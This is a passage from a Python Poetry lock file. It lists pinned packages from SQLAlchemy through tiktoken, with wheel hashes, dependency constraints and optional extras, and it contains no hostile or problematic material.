"SQLAlchemy-2.0.22-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b39a6e21110204a8c08d40ff56a73ba542ec60bab701c36ce721e7990df49fb9"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:53a766cb0b468223cafdf63e2d37f14a4757476157927b09300c8c5832d88560"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:0e1ce8ebd2e040357dde01a3fb7d30d9b5736b3e54a94002641dfd0aa12ae6ce"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:505f503763a767556fa4deae5194b2be056b64ecca72ac65224381a0acab7ebe"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-win32.whl", hash = "sha256:154a32f3c7b00de3d090bc60ec8006a78149e221f1182e3edcf0376016be9396"}, {file = "SQLAlchemy-2.0.22-cp312-cp312-win_amd64.whl", hash = "sha256:129415f89744b05741c6f0b04a84525f37fbabe5dc3774f7edf100e7458c48cd"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:3940677d341f2b685a999bffe7078697b5848a40b5f6952794ffcf3af150c301"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:55914d45a631b81a8a2cb1a54f03eea265cf1783241ac55396ec6d735be14883"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2096d6b018d242a2bcc9e451618166f860bb0304f590d205173d317b69986c95"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:19c6986cf2fb4bc8e0e846f97f4135a8e753b57d2aaaa87c50f9acbe606bd1db"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:6ac28bd6888fe3c81fbe97584eb0b96804bd7032d6100b9701255d9441373ec1"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-win32.whl", hash = "sha256:cb9a758ad973e795267da334a92dd82bb7555cb36a0960dcabcf724d26299db8"}, {file = "SQLAlchemy-2.0.22-cp37-cp37m-win_amd64.whl", hash = "sha256:40b1206a0d923e73aa54f0a6bd61419a96b914f1cd19900b6c8226899d9742ad"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3aa1472bf44f61dd27987cd051f1c893b7d3b17238bff8c23fceaef4f1133868"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:56a7e2bb639df9263bf6418231bc2a92a773f57886d371ddb7a869a24919face"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ccca778c0737a773a1ad86b68bda52a71ad5950b25e120b6eb1330f0df54c3d0"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7c6c3e9350f9fb16de5b5e5fbf17b578811a52d71bb784cc5ff71acb7de2a7f9"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:564e9f9e4e6466273dbfab0e0a2e5fe819eec480c57b53a2cdee8e4fdae3ad5f"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:af66001d7b76a3fab0d5e4c1ec9339ac45748bc4a399cbc2baa48c1980d3c1f4"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-win32.whl", hash = "sha256:9e55dff5ec115316dd7a083cdc1a52de63693695aecf72bc53a8e1468ce429e5"}, {file = "SQLAlchemy-2.0.22-cp38-cp38-win_amd64.whl", hash = "sha256:4e869a8ff7ee7a833b74868a0887e8462445ec462432d8cbeff5e85f475186da"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:9886a72c8e6371280cb247c5d32c9c8fa141dc560124348762db8a8b236f8692"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:a571bc8ac092a3175a1d994794a8e7a1f2f651e7c744de24a19b4f740fe95034"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8db5ba8b7da759b727faebc4289a9e6a51edadc7fc32207a30f7c6203a181592"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0b0b3f2686c3f162123adba3cb8b626ed7e9b8433ab528e36ed270b4f70d1cdb"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:0c1fea8c0abcb070ffe15311853abfda4e55bf7dc1d4889497b3403629f3bf00"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:4bb062784f37b2d75fd9b074c8ec360ad5df71f933f927e9e95c50eb8e05323c"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-win32.whl", hash = "sha256:58a3aba1bfb32ae7af68da3f277ed91d9f57620cf7ce651db96636790a78b736"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-win_amd64.whl", hash = "sha256:92e512a6af769e4725fa5b25981ba790335d42c5977e94ded07db7d641490a85"}, {file = "SQLAlchemy-2.0.22-py3-none-any.whl", hash = "sha256:3076740335e4aaadd7deb3fe6dcb96b3015f1613bd190a4e1634e1b99b02ec86"}, {file = "SQLAlchemy-2.0.22.tar.gz", hash = "sha256:5434cc601aa17570d79e5377f5fd45ff92f9379e2abed0be5e8c2fba8d353d2b"}, ] [package.dependencies] greenlet = {version = "!=0.4.17", markers = "platform_machine == \"aarch64\" or platform_machine == \"ppc64le\" or platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\" or platform_machine == \"win32\" or platform_machine == \"WIN32\""} typing-extensions = ">=4.2.0" [package.extras] aiomysql = ["aiomysql (>=0.2.0)", "greenlet (!=0.4.17)"] aiosqlite = ["aiosqlite", "greenlet (!=0.4.17)", "typing-extensions (!=3.10.0.1)"] asyncio = ["greenlet (!=0.4.17)"] asyncmy = ["asyncmy (>=0.2.3,!=0.2.4,!=0.2.6)", "greenlet (!=0.4.17)"] mariadb-connector = ["mariadb (>=1.0.1,!=1.1.2,!=1.1.5)"] mssql = ["pyodbc"] mssql-pymssql = ["pymssql"] mssql-pyodbc = ["pyodbc"] mypy = ["mypy (>=0.910)"] mysql = ["mysqlclient (>=1.4.0)"] mysql-connector = ["mysql-connector-python"] oracle = ["cx-oracle (>=7)"] oracle-oracledb = ["oracledb (>=1.0.1)"] postgresql = ["psycopg2 (>=2.7)"] postgresql-asyncpg = ["asyncpg", "greenlet (!=0.4.17)"] postgresql-pg8000 = ["pg8000 (>=1.29.1)"] postgresql-psycopg = ["psycopg (>=3.0.7)"] postgresql-psycopg2binary = ["psycopg2-binary"] postgresql-psycopg2cffi = ["psycopg2cffi"] postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"] pymysql = ["pymysql"] sqlcipher = ["sqlcipher3-binary"] [[package]] name = "sqlite-vss" version = "0.1.2" description = "" optional = true python-versions = ">=3.7" files = [ {file = "sqlite_vss-0.1.2-py3-none-macosx_10_6_x86_64.whl", hash = "sha256:9eefa4207f8b522e32b2747fce44422c773e36710bf807613795218c7ba125f0"}, {file = "sqlite_vss-0.1.2-py3-none-macosx_11_0_arm64.whl", hash = "sha256:84994eaf7fe700218b258422358c4536a6aca39b96026c308b28630967f954c4"}, {file = "sqlite_vss-0.1.2-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux1_x86_64.whl", hash = "sha256:e44f03bc4cb214bb77b206519abfb623e3e4795967a569218e288927a7715806"}, ] [package.extras] test = ["pytest"] [[package]] name = "sqlitedict" version = "2.1.0" description = "Persistent dict in Python, backed up by sqlite3 and pickle, multithread-safe." optional = true python-versions = "*" files = [ {file = "sqlitedict-2.1.0.tar.gz", hash = "sha256:03d9cfb96d602996f1d4c2db2856f1224b96a9c431bdd16e78032a72940f9e8c"}, ] [[package]] name = "sqlparams" version = "5.1.0" description = "Convert between various DB API 2.0 parameter styles." optional = true python-versions = ">=3.7" files = [ {file = "sqlparams-5.1.0-py3-none-any.whl", hash = "sha256:ee4ef620a5197535e5ebb9217e2f453f08b044634b3d890f3d6701e4f838c85c"}, {file = "sqlparams-5.1.0.tar.gz", hash = "sha256:1abe87a0684567265b2b86f5a482d5c37db237c0268d4c81774ffedce4300199"}, ] [[package]] name = "stack-data" version = "0.6.3" description = "Extract data from python stack frames and tracebacks for informative displays" optional = false python-versions = "*" files = [ {file = "stack_data-0.6.3-py3-none-any.whl", hash = "sha256:d5558e0c25a4cb0853cddad3d77da9891a08cb85dd9f9f91b9f8cd66e511e695"}, {file = "stack_data-0.6.3.tar.gz", hash = "sha256:836a778de4fec4dcd1dcd89ed8abff8a221f58308462e1c4aa2a3cf30148f0b9"}, ] [package.dependencies] asttokens = ">=2.1.0" executing = ">=1.2.0" pure-eval = "*" [package.extras] tests = ["cython", "littleutils", "pygments", "pytest", "typeguard"] [[package]] name = "streamlit" version = "1.22.0" description = "A faster way to build and share data apps" optional = true python-versions = ">=3.7, !=3.9.7" files = [ {file = "streamlit-1.22.0-py2.py3-none-any.whl", hash = "sha256:520dd9b9e6efb559b5a9a22feadb48b1e6f0340ec83da3514810059fdecd4167"}, {file = "streamlit-1.22.0.tar.gz", hash = "sha256:5bef9bf8deef32814d9565c9df48331e6357eb0b90dabc3ec4f53c44fb34fc73"}, ] [package.dependencies] altair = ">=3.2.0,<5" blinker = ">=1.0.0" cachetools = ">=4.0" click = ">=7.0" gitpython = "!=3.1.19" importlib-metadata = ">=1.4" numpy = "*" packaging = ">=14.1" pandas = ">=0.25,<3" pillow = ">=6.2.0" protobuf = ">=3.12,<4" pyarrow = ">=4.0" pydeck = ">=0.1.dev5" pympler = ">=0.9" python-dateutil = "*" requests = ">=2.4" rich = ">=10.11.0" tenacity = ">=8.0.0,<9" toml = "*" tornado = ">=6.0.3" typing-extensions = ">=3.10.0.0" tzlocal = ">=1.1" validators = ">=0.2" watchdog = {version = "*", markers = "platform_system != \"Darwin\""} [package.extras] snowflake = ["snowflake-snowpark-python"] [[package]] name = "stringcase" version = "1.2.0" description = "String case converter." optional = true python-versions = "*" files = [ {file = "stringcase-1.2.0.tar.gz", hash = "sha256:48a06980661908efe8d9d34eab2b6c13aefa2163b3ced26972902e3bdfd87008"}, ] [[package]] name = "sympy" version = "1.12" description = "Computer algebra system (CAS) in Python" optional = true python-versions = ">=3.8" files = [ {file = "sympy-1.12-py3-none-any.whl", hash = "sha256:c3588cd4295d0c0f603d0f2ae780587e64e2efeedb3521e46b9bb1d08d184fa5"}, {file = "sympy-1.12.tar.gz", hash = "sha256:ebf595c8dac3e0fdc4152c51878b498396ec7f30e7a914d6071e674d49420fb8"}, ] [package.dependencies] mpmath = ">=0.19" [[package]] name = "syrupy" version = "4.6.0" description = "Pytest Snapshot Test Utility" optional = false python-versions = ">=3.8.1,<4" files = [ {file = "syrupy-4.6.0-py3-none-any.whl", hash = "sha256:747aae1bcf3cb3249e33b1e6d81097874d23615982d5686ebe637875b0775a1b"}, {file = "syrupy-4.6.0.tar.gz", hash = "sha256:231b1f5d00f1f85048ba81676c79448076189c4aef4d33f21ae32f3b4c565a54"}, ] [package.dependencies] pytest = ">=7.0.0,<8.0.0" [[package]] name = "telethon" version = "1.31.1" description = "Full-featured Telegram client library for Python 3" optional = true python-versions = ">=3.5" files = [ {file = "Telethon-1.31.1.tar.gz", hash = "sha256:299567c307818e0ecd1ecb208c2f4269be4ea84fdea49b5061c36362dc92abbd"}, ] [package.dependencies] pyaes = "*" rsa = "*" [package.extras] cryptg = ["cryptg"] [[package]] name = "tenacity" version = "8.2.3" description = "Retry code until it succeeds" optional = false python-versions = ">=3.7" files = [ {file = "tenacity-8.2.3-py3-none-any.whl", hash = "sha256:ce510e327a630c9e1beaf17d42e6ffacc88185044ad85cf74c0a8887c6a0f88c"}, {file = "tenacity-8.2.3.tar.gz", hash = "sha256:5398ef0d78e63f40007c1fb4c0bff96e1911394d2fa8d194f77619c05ff6cc8a"}, ] [package.extras] doc = ["reno", "sphinx", "tornado (>=4.5)"] [[package]] name = "tensorboard" version = "2.11.2" description = "TensorBoard lets you watch Tensors Flow" optional = true python-versions = ">=3.7" files = [ {file = "tensorboard-2.11.2-py3-none-any.whl", hash = "sha256:cbaa2210c375f3af1509f8571360a19ccc3ded1d9641533414874b5deca47e89"}, ] [package.dependencies] absl-py = ">=0.4" google-auth = ">=1.6.3,<3" google-auth-oauthlib = ">=0.4.1,<0.5" grpcio = ">=1.24.3" markdown = ">=2.6.8" numpy = ">=1.12.0" protobuf = ">=3.9.2,<4" requests = ">=2.21.0,<3" setuptools = ">=41.0.0" tensorboard-data-server = ">=0.6.0,<0.7.0" tensorboard-plugin-wit = ">=1.6.0" werkzeug = ">=1.0.1" wheel = ">=0.26" [[package]] name = "tensorboard-data-server" version = "0.6.1" description = "Fast data loading for TensorBoard" optional = true python-versions = ">=3.6" files = [ {file = "tensorboard_data_server-0.6.1-py3-none-any.whl", hash = "sha256:809fe9887682d35c1f7d1f54f0f40f98bb1f771b14265b453ca051e2ce58fca7"}, {file = "tensorboard_data_server-0.6.1-py3-none-macosx_10_9_x86_64.whl", hash = "sha256:fa8cef9be4fcae2f2363c88176638baf2da19c5ec90addb49b1cde05c95c88ee"}, {file = "tensorboard_data_server-0.6.1-py3-none-manylinux2010_x86_64.whl", hash = "sha256:d8237580755e58eff68d1f3abefb5b1e39ae5c8b127cc40920f9c4fb33f4b98a"}, ] [[package]] name = "tensorboard-plugin-wit" version = "1.8.1" description = "What-If Tool TensorBoard plugin." optional = true python-versions = "*" files = [ {file = "tensorboard_plugin_wit-1.8.1-py3-none-any.whl", hash = "sha256:ff26bdd583d155aa951ee3b152b3d0cffae8005dc697f72b44a8e8c2a77a8cbe"}, ] [[package]] name = "tensorflow" version = "2.11.1" description = "TensorFlow is an open source machine learning framework for everyone." optional = true python-versions = ">=3.7" files = [ {file = "tensorflow-2.11.1-cp310-cp310-macosx_10_14_x86_64.whl", hash = "sha256:ac0e46c5de7985def49e4f688a0ca4180949a4d5dc62b89e9c6640db3c3982ba"}, {file = "tensorflow-2.11.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:45b1669c523fa6dc240688bffe79f08dfbb76bf5e23a7fe10e722ba658637a44"}, {file = "tensorflow-2.11.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9a96595e0c068d54717405fa12f36b4a5bb0a9fc53fb9065155a92cff944b35b"}, {file = "tensorflow-2.11.1-cp310-cp310-win_amd64.whl", hash = "sha256:13197f18f31a52d3f2eac28743d1b06abb8efd86017f184110a1b16841b745b1"}, {file = "tensorflow-2.11.1-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:9f030f1bc9e7763fa03ec5738323c42021ababcd562fe861b3a3f41e9ff10e43"}, {file = "tensorflow-2.11.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9f12855c1e8373c1327650061fd6a9a3d3772e1bac8241202ea8ccb56213d005"}, {file = "tensorflow-2.11.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:76cd4279cb500074a8ab28af116af7f060f0b015651bef552769d51e55d6fd5c"}, {file = "tensorflow-2.11.1-cp38-cp38-win_amd64.whl", hash = "sha256:f5a2f75f28cd5fb615a5306f2091eac7da3a8fff949ab8804ec06b8e3682f837"}, {file = "tensorflow-2.11.1-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:ea93246ad6c90ff0422f06a82164836fe8098989a8a65c3b02c720eadbe15dde"}, {file = "tensorflow-2.11.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:30ba6b3c2f68037e965a19427a1f2a5f0351b7ceae6c686938a8485b08e1e1f3"}, {file = "tensorflow-2.11.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9ddd5c61f68d8125c985370de96a24a80aee5e3f1604efacec7e1c34ca72de24"}, {file = "tensorflow-2.11.1-cp39-cp39-win_amd64.whl", hash = "sha256:b7d8834df3f72d7eab56bc2f34f2e52b82d705776b80b36bf5470b7538c9865c"}, ] [package.dependencies] absl-py = ">=1.0.0" astunparse = ">=1.6.0" flatbuffers = ">=2.0" gast = ">=0.2.1,<=0.4.0" google-pasta = ">=0.1.1" grpcio = ">=1.24.3,<2.0" h5py = ">=2.9.0" keras = ">=2.11.0,<2.12" libclang = ">=13.0.0" numpy = ">=1.20" opt-einsum = ">=2.3.2" packaging = "*" protobuf = ">=3.9.2,<3.20" setuptools = "*" six = ">=1.12.0" tensorboard = ">=2.11,<2.12" tensorflow-estimator = ">=2.11.0,<2.12" tensorflow-io-gcs-filesystem = {version = ">=0.23.1", markers = "platform_machine != \"arm64\" or platform_system != \"Darwin\""} termcolor = ">=1.1.0" typing-extensions = ">=3.6.6" wrapt = ">=1.11.0" [[package]] name = "tensorflow-estimator" version = "2.11.0" description = "TensorFlow Estimator." optional = true python-versions = ">=3.7" files = [ {file = "tensorflow_estimator-2.11.0-py2.py3-none-any.whl", hash = "sha256:ea3b64acfff3d9a244f06178c9bdedcbdd3f125b67d0888dba8229498d06468b"}, ] [[package]] name = "tensorflow-hub" version = "0.15.0" description = "TensorFlow Hub is a library to foster the publication, discovery, and consumption of reusable parts of machine learning models." optional = true python-versions = "*" files = [ {file = "tensorflow_hub-0.15.0-py2.py3-none-any.whl", hash = "sha256:8af12cb2d1fc0d1a9509a620e7589daf173714e99f08aaf090a4748ff20b45c8"}, ] [package.dependencies] numpy = ">=1.12.0" protobuf = ">=3.19.6" [[package]] name = "tensorflow-io-gcs-filesystem" version = "0.34.0" description = "TensorFlow IO" optional = true python-versions = ">=3.7, <3.12" files = [ {file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-macosx_10_14_x86_64.whl", hash = "sha256:d831702fbb270996b27cda7fde06e0825b2ea81fd8dd3ead35242f4f8b3889b8"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:b9a93fcb01db269bc845a1ced431f3c61201755ce5f9ec4885760f30122276ef"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:5813c336b4f7cb0a01ff4cc6cbd3edf11ef67305baf0e3cf634911b702f493f8"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2b035f4c92639657b6d376929d550ac3dee9e6c0523eb434eefe0a27bae3d05b"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-macosx_10_14_x86_64.whl", hash = "sha256:a17a616d2c7fae83de4424404815843507d40d4eb0d507c636a5493a20c3d958"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:ec4604c99cbb5b708f4516dee27aa655abae222b876c98b740f4c2f89dd5c001"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:cbe26c4a3332589c7b724f147df453b5c226993aa8d346a15536358d77b364c4"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6e6353123a5b51397950138a118876af833a7db66b531123bb86f82e80ab0e72"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp37-cp37m-macosx_10_14_x86_64.whl", hash = "sha256:f211d2b3db8f9931765992b607b71cbfb98c8cd6169079d004a67a94ab10ecb4"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp37-cp37m-macosx_12_0_arm64.whl", hash = "sha256:d3feba2dd76f7c188137c34642d68d378f0eed81636cb95090ecb1496722707c"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:44ad387a812a78e7424bb8bee3820521ae1c044bddf72b1e163e8df95c124a74"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:7f60183473f0ca966451bb1d1bb5dc29b3cf9c74d1d0e7f2ed46760ed56bd4af"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:3f346b287ed2400e09b13cfd8524222fd70a66aadb9164c645286c2087007e9f"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:027a07553367187f918a99661f63ae0506b91b77a70bee9c7ccaf3920bf7cfe7"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8d8664bddbe4e7b56ce94db8b93ea9077a158fb5e15364e11e29f93015ceea24"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:182b0fbde7e9a537fda0b354c28b0b6c035736728de8fe2db7ef49cf90352014"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:0dafed144673e1173528768fe208a7c5a6e8edae40208381cac420ee7c918ec9"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:396bfff61b49f80b86ddebe0c76ae0f2731689cee49ad7d782625180b50b13af"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b20622f8572fcb6c93e8f7d626327472f263e47ebd63d2153ef09162ef5ef7b5"}, ] [package.extras] tensorflow = ["tensorflow (>=2.13.0,<2.14.0)"] tensorflow-aarch64 = ["tensorflow-aarch64 (>=2.13.0,<2.14.0)"] tensorflow-cpu = ["tensorflow-cpu (>=2.13.0,<2.14.0)"] tensorflow-gpu = ["tensorflow-gpu (>=2.13.0,<2.14.0)"] tensorflow-rocm = ["tensorflow-rocm (>=2.13.0,<2.14.0)"] [[package]] name = "tensorflow-macos" version = "2.11.0" description = "TensorFlow is an open source machine learning framework for everyone." optional = true python-versions = ">=3.7" files = [ {file = "tensorflow_macos-2.11.0-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:0bdbd1bb564d01bd735d6d11451f0658c3dd8187369ee9dd3ed6de6bbdd6df53"}, {file = "tensorflow_macos-2.11.0-cp310-cp310-macosx_12_0_x86_64.whl", hash = "sha256:66eb67915cf418eddd3b4c158132609efd50895fa09fd55e4b2f14a3ab85bd34"}, {file = "tensorflow_macos-2.11.0-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:6810731e2c8353123f6c9c944d2765b58a2226e7eb9fec1e360f73977c6c6aa4"}, {file = "tensorflow_macos-2.11.0-cp38-cp38-macosx_12_0_x86_64.whl", hash = "sha256:881b36d97b67d24197250a091c52c31db14aecfdbf1ac20418a148ec37321978"}, {file = "tensorflow_macos-2.11.0-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:8d56b0d0bd140008b0cc4877804c9c310e1e2735444fa99bc7c88ffb2909153d"}, {file = "tensorflow_macos-2.11.0-cp39-cp39-macosx_12_0_x86_64.whl", hash = "sha256:db97cd91b905bd01069069f07325a2a291705222eb4914148b9574090a5815ae"}, ] [package.dependencies] absl-py = ">=1.0.0" astunparse = ">=1.6.0" flatbuffers = ">=2.0" gast = ">=0.2.1,<=0.4.0" google-pasta = ">=0.1.1" grpcio = ">=1.24.3,<2.0" h5py = ">=2.9.0" keras = ">=2.11.0,<2.12" libclang = ">=13.0.0" numpy = ">=1.20" opt-einsum = ">=2.3.2" packaging = "*" protobuf = ">=3.9.2,<3.20" setuptools = "*" six = ">=1.12.0" tensorboard = ">=2.11,<2.12" tensorflow-estimator = ">=2.11.0,<2.12" termcolor = ">=1.1.0" typing-extensions = ">=3.6.6" wrapt = ">=1.11.0" [[package]] name = "tensorflow-text" version = "2.11.0" description = "TF.Text is a TensorFlow library of text related ops, modules, and subgraphs." optional = true python-versions = "*" files = [ {file = "tensorflow_text-2.11.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c9d4797e331da37419f2b19159fbc0f125ed60467340e9a209ab8f8d65856704"}, {file = "tensorflow_text-2.11.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b4abede4191820ae6d5a7c74f02c335a5f2e2df174eaa38b481b2b82a3330152"}, {file = "tensorflow_text-2.11.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:49194f85e03a2e3f017ac8e0e3d3927104fa20e6e883b43087cff032fe2cbe14"}, {file = "tensorflow_text-2.11.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a3ea14efeb1d627ed5098e791e95bb98ee6f9f928f9eda785205e184cc20b428"}, {file = "tensorflow_text-2.11.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:a207ceea4c71a932c35e4d208d7b8c3edc65a5ba0eebfdc9233fc8da546625c9"}, {file = "tensorflow_text-2.11.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:506fbea82a1ec566d7d0f771adad589c44727d904311103169466d88236ec2c8"}, {file = "tensorflow_text-2.11.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:cf0033bf47872b57d46f78d7058db5676f396a9327fa4d063a2c73cce43586ae"}, {file = "tensorflow_text-2.11.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:56693df33461ab0e7f32549010ca38a8d01291fd67142e0396d0aeb9fcad2e09"}, ] [package.dependencies] tensorflow = {version = ">=2.11.0,<2.12", markers = "platform_machine != \"arm64\" or platform_system != \"Darwin\""} tensorflow-hub = ">=0.8.0" tensorflow-macos = {version = ">=2.11.0,<2.12", markers = "platform_machine == \"arm64\" and platform_system == \"Darwin\""} [package.extras] tensorflow-cpu = ["tensorflow-cpu (>=2.11.0,<2.12)"] tests = ["absl-py", "pytest", "tensorflow-datasets (>=3.2.0)"] [[package]] name = "termcolor" version = "2.3.0" description = "ANSI color formatting for output in terminal" optional = true python-versions = ">=3.7" files = [ {file = "termcolor-2.3.0-py3-none-any.whl", hash = "sha256:3afb05607b89aed0ffe25202399ee0867ad4d3cb4180d98aaf8eefa6a5f7d475"}, {file = "termcolor-2.3.0.tar.gz", hash = "sha256:b5b08f68937f138fe92f6c089b99f1e2da0ae56c52b78bf7075fd95420fd9a5a"}, ] [package.extras] tests = ["pytest", "pytest-cov"] [[package]] name = "terminado" version = "0.17.1" description = "Tornado websocket backend for the Xterm.js Javascript terminal emulator library." optional = false python-versions = ">=3.7" files = [ {file = "terminado-0.17.1-py3-none-any.whl", hash = "sha256:8650d44334eba354dd591129ca3124a6ba42c3d5b70df5051b6921d506fdaeae"}, {file = "terminado-0.17.1.tar.gz", hash = "sha256:6ccbbcd3a4f8a25a5ec04991f39a0b8db52dfcd487ea0e578d977e6752380333"}, ] [package.dependencies] ptyprocess = {version = "*", markers = "os_name != \"nt\""} pywinpty = {version = ">=1.1.0", markers = "os_name == \"nt\""} tornado = ">=6.1.0" [package.extras] docs = ["myst-parser", "pydata-sphinx-theme", "sphinx"] test = ["pre-commit", "pytest (>=7.0)", "pytest-timeout"] [[package]] name = "textstat" version = "0.7.3" description = "Calculate statistical features from text" optional = true python-versions = ">=3.6" files = [ {file = "textstat-0.7.3-py3-none-any.whl", hash = "sha256:cbd9d641aa5abff0852638f0489913f31ea52fe597ccbaa337b4fc2a44efd15e"}, {file = "textstat-0.7.3.tar.gz", hash = "sha256:60b63cf8949f45bbb3b4205e4411bbc1cd66df4c08aef12545811c7e6e24f011"}, ] [package.dependencies] pyphen = "*" [[package]] name = "threadpoolctl" version = "3.2.0" description = "threadpoolctl" optional = true python-versions = ">=3.8" files = [ {file = "threadpoolctl-3.2.0-py3-none-any.whl", hash = "sha256:2b7818516e423bdaebb97c723f86a7c6b0a83d3f3b0970328d66f4d9104dc032"}, {file = "threadpoolctl-3.2.0.tar.gz", hash = "sha256:c96a0ba3bdddeaca37dc4cc7344aafad41cdb8c313f74fdfe387a867bba93355"}, ] [[package]] name = "tigrisdb" version = "1.0.0b6" description = "Python SDK for Tigris <http://www.tigrisdata.com>" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "tigrisdb-1.0.0b6-py3-none-any.whl", hash = "sha256:8d316a61df0df09f6a269be729f8077af965d6bc39f6a00b60d3ffcb57f9d80b"}, {file = "tigrisdb-1.0.0b6.tar.gz", hash = "sha256:5160b3379aaa379fa4194c3e5d549e8be723aab922991021b8c0afd340ff14f5"}, ] [package.dependencies] grpcio-tools = ">=1.46.0" protobuf = ">=3.19.6" [[package]] name = "tiktoken" version = "0.3.3" description = "tiktoken is a fast BPE tokeniser for use with OpenAI's models" optional = false python-versions = ">=3.8" files = [ {file = 